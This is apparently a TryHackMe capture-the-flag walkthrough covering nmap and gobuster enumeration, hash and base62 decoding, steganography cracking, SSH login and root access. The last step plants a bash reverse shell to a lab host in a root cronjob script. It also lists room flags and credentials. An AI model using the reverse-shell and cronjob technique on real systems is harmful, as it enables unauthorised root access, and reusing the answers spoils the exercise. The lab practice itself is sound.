Run nmap scan for port and service scanning
Nmap -p- 10.10.8.182
Nmap -sCV 10.10.8.182
Hit on the web browser with the highest port , and got the service is Apache
THM questions: Enumeration through Nmap
Download the given file and sort it
For Question 1:
Using gobuster to find out the directory List
Using gobuster to find out the directory under the hidden directory
View the page source of recently found page and using cyberchef to find out the flag 1
Flag 1: flag{f1rs7_fl4g}
For question 2:
Visit http://10.10.132.149:65524/robots.txt and found a hash value
a18672860d0510e5ab6699730763b250
Now go to this site https://md5hashing.net/ dycrypt the hash value
flag{1m_s3c0nd_fl4g}
For question 3:
On the 10.10.132.149:65524 page view source found the flag 3
Flag 3: lag{9fdafbd64c47471a8f54cd3fc64cd312}
For question 4:
On the 10.10.132.149:65524 page view source found the hidden tag and a hash starting with ba…..
Here mention ba.. value so we try all base decoder. Using cyberchef we can crack the base62 value
10.10.132.149:65524/n0th1ng3ls3m4tt3r
For question 5:
View source of 10.10.132.149:65524/n0th1ng3ls3m4tt3r/ and get a hash value
940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81
Using john tool try to crack the password
For Question 6:
View source of 10.10.132.149:65524/n0th1ng3ls3m4tt3r/ and Download the image
Try to get information about the image by steghide tool but need a passphrease
Crack the image by stegcracer tool using the given password file,
and get the extract information in to file called easypeasy.jpeg.out
Convert it from binary to decimal
Try to connect via SSH with port 6498
Username: boring
Password: iconvertedmypasswordtobinary
For Question 7:
Found a file called user.txt but cant get the flag , It seems the encrypted. There is a hinted mentioning Rotated.
Decoded it with cyberchef root13 decoder flag{n0wits33msn0rm4l}
For Qustion 8:
As mention on the room task there must be a cronjob running
Found a cronjob is running named .mysecrectcronjob.sh
Open this file with editor and add this line for access a reverse shell.
bash -i >& /dev/tcp/10.10.8.87/4444 0>&1
Run listening port on my local machine and access that machine as root user
Then fond the hidden file .root.txt at the root user home directory and there found the last flag
flag{63a9f0ea7bb98050796b649e85481845}